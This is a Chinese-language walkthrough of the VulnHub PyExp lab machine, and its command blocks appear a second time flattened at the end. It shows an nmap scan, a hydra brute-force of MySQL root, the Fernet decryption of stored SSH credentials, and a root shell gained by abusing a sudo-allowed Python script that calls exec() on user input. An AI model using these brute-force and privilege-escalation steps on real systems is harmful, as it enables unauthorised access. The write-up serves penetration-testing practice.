PyExp

https://download.vulnhub.com/pyexp/pyexpvm.zip

靶场IP地址：192.168.2.137

扫描对外端口服务

┌──(root💀kali)-[/tmp]
└─# nmap -p1-65535 -sV 192.168.2.137                                                                                                                                                                                                     1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-06 11:35 EDT
Nmap scan report for 192.168.2.137
Host is up (0.00055s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
1337/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
3306/tcp open  mysql   MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1
MAC Address: 00:0C:29:42:B2:78 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.23 seconds

爆破MySQL服务

                                                                                                                                                                                                                                             
┌──(root💀kali)-[/tmp]
└─# hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.2.137 -t 64                                                                                                                                                      255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-06 11:38:57
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.2.137:3306/
[STATUS] 2041.00 tries/min, 2041 tries in 00:01h, 14342358 to do in 117:08h, 4 active
[3306][mysql] host: 192.168.2.137   login: root   password: prettywoman
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-06 11:41:54

登录MySQL查询信息

┌──(root💀kali)-[/tmp]
└─# mysql -u root -p -h  192.168.2.137                                                                                                                                                                                                 
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 20017
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| data               |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.001 sec)

MariaDB [(none)]> use data;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [data]> show tables;
+----------------+
| Tables_in_data |
+----------------+
| fernet         |
+----------------+
1 row in set (0.001 sec)

MariaDB [data]> select * from fernet;
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| cred                                                                                                                     | keyy                                         |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
1 row in set (0.001 sec)

根据表名和内容可以知道，是要用fernet解密内容

from cryptography.fernet import Fernet

key = "UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0="
cred = "gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys="

f = Fernet(key)

# convert from string to bytes
cred_byte = str.encode(cred)

# decrypt
decrypted = f.decrypt(cred_byte)

# convert back to string from bytes
decrypted_final = decrypted.decode()

# print the final answer
print(decrypted_final)

┌──(root💀kali)-[/tmp]
└─# python3 exp.py         
lucy:wJ9`"Lemdv9[FEw-

ssh登录lucy账号，查看sudo列表

┌──(root💀kali)-[/tmp]
└─# ssh -p 1337 lucy@192.168.2.137
lucy@192.168.2.137's password: 
Linux pyexp 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug 10 18:44:44 2020 from 192.168.1.18
lucy@pyexp:~$ id
uid=1000(lucy) gid=1000(lucy) groups=1000(lucy),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
lucy@pyexp:~$ sudo -l
Matching Defaults entries for lucy on pyexp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucy may run the following commands on pyexp:
    (root) NOPASSWD: /usr/bin/python2 /opt/exp.py

查看exp.py

lucy@pyexp:~$ cat /opt/exp.py 
uinput = raw_input('how are you?')
exec(uinput)

lucy@pyexp:~$ ls -al /opt/exp.py 
-rw-r--r-- 1 root root 49 Aug 10  2020 /opt/exp.py

提权

lucy@pyexp:~$ sudo -u root /usr/bin/python2 /opt/exp.py
how are you?import os; os.system("/bin/sh")
# id
uid=0(root) gid=0(root) groups=0(root)

上一页PWNOS：2.0 下一页Raven 1

最后更新于2年前

这有帮助吗？

┌──(root💀kali)-[/tmp] └─# nmap -p1-65535 -sV 192.168.2.137 1 ⨯ Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-06 11:35 EDT Nmap scan report for 192.168.2.137 Host is up (0.00055s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 1337/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 3306/tcp open mysql MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1 MAC Address: 00:0C:29:42:B2:78 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.23 seconds

┌──(root💀kali)-[/tmp] └─# hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.2.137 -t 64 255 ⨯ Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-06 11:38:57 [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections) [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task [DATA] attacking mysql://192.168.2.137:3306/ [STATUS] 2041.00 tries/min, 2041 tries in 00:01h, 14342358 to do in 117:08h, 4 active [3306][mysql] host: 192.168.2.137 login: root password: prettywoman 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 1 final worker threads did not complete until end. [ERROR] 1 target did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-06 11:41:54

┌──(root💀kali)-[/tmp] └─# mysql -u root -p -h 192.168.2.137 Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 20017 Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | data | | information_schema | | mysql | | performance_schema | +--------------------+ 4 rows in set (0.001 sec) MariaDB [(none)]> use data; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [data]> show tables; +----------------+ | Tables_in_data | +----------------+ | fernet | +----------------+ 1 row in set (0.001 sec) MariaDB [data]> select * from fernet; +--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+ | cred | keyy | +--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+ | gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= | +--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+ 1 row in set (0.001 sec)

from cryptography.fernet import Fernet key = "UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=" cred = "gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=" f = Fernet(key) # convert from string to bytes cred_byte = str.encode(cred) # decrypt decrypted = f.decrypt(cred_byte) # convert back to string from bytes decrypted_final = decrypted.decode() # print the final answer print(decrypted_final)

┌──(root💀kali)-[/tmp] └─# ssh -p 1337 lucy@192.168.2.137 lucy@192.168.2.137's password: Linux pyexp 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Aug 10 18:44:44 2020 from 192.168.1.18 lucy@pyexp:~$ id uid=1000(lucy) gid=1000(lucy) groups=1000(lucy),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) lucy@pyexp:~$ sudo -l Matching Defaults entries for lucy on pyexp: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User lucy may run the following commands on pyexp: (root) NOPASSWD: /usr/bin/python2 /opt/exp.py